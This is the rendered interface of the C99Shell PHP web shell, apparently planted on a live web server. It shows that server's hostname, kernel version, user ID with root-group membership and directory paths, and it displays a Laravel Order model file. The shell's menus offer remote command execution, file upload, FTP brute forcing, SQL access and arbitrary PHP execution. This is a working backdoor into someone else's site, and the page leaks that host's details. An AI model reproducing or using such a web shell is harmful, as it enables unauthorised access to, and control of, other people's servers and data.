!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/game.picotech.app/public_html/core/app/Models/   drwxr-xr-x
Free 29.37 GB of 117.98 GB (24.89%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Order.php (1.21 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace App\Models;
use 
DB;

use 
Illuminate\Database\Eloquent\Model;

class 
Order extends Model
{
    protected 
$fillable = [
        
'user_id',
        
'user_info',
        
'cart',
        
'shipping',
        
'discount',
        
'payment_method',
        
'txnid',
        
'charge_id',
        
'transaction_number',
        
'order_status',
        
'payment_status',
        
'shipping_info',
        
'billing_info',
        
'currency_sign',
        
'currency_value',
        
'tax',
        
'state_price',
        
'state'
    
];

    public function 
item()
    {
        return 
$this->belongsTo('App\Models\Item''item_id''id')->withDefault();
    }
    public function 
user()
    {
        return 
$this->belongsTo('App\Models\User')->withDefault();
    }

    public function 
tracks()
    {
        return 
$this->belongsTo('App\Models\TrackOrder','order_id')->withDefault();
    }

    public function 
tranaction()
    {
        return 
$this->hasOne('App\Models\Transaction','order_id')->withDefault();
    }

    public function 
tracks_data()
    {
        return 
$this->hasMany('App\Models\TrackOrder','order_id');
    }

    public function 
notificaton()
    {
        return 
$this->hasMany('App\Models\Notification','order_id');
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0069 ]--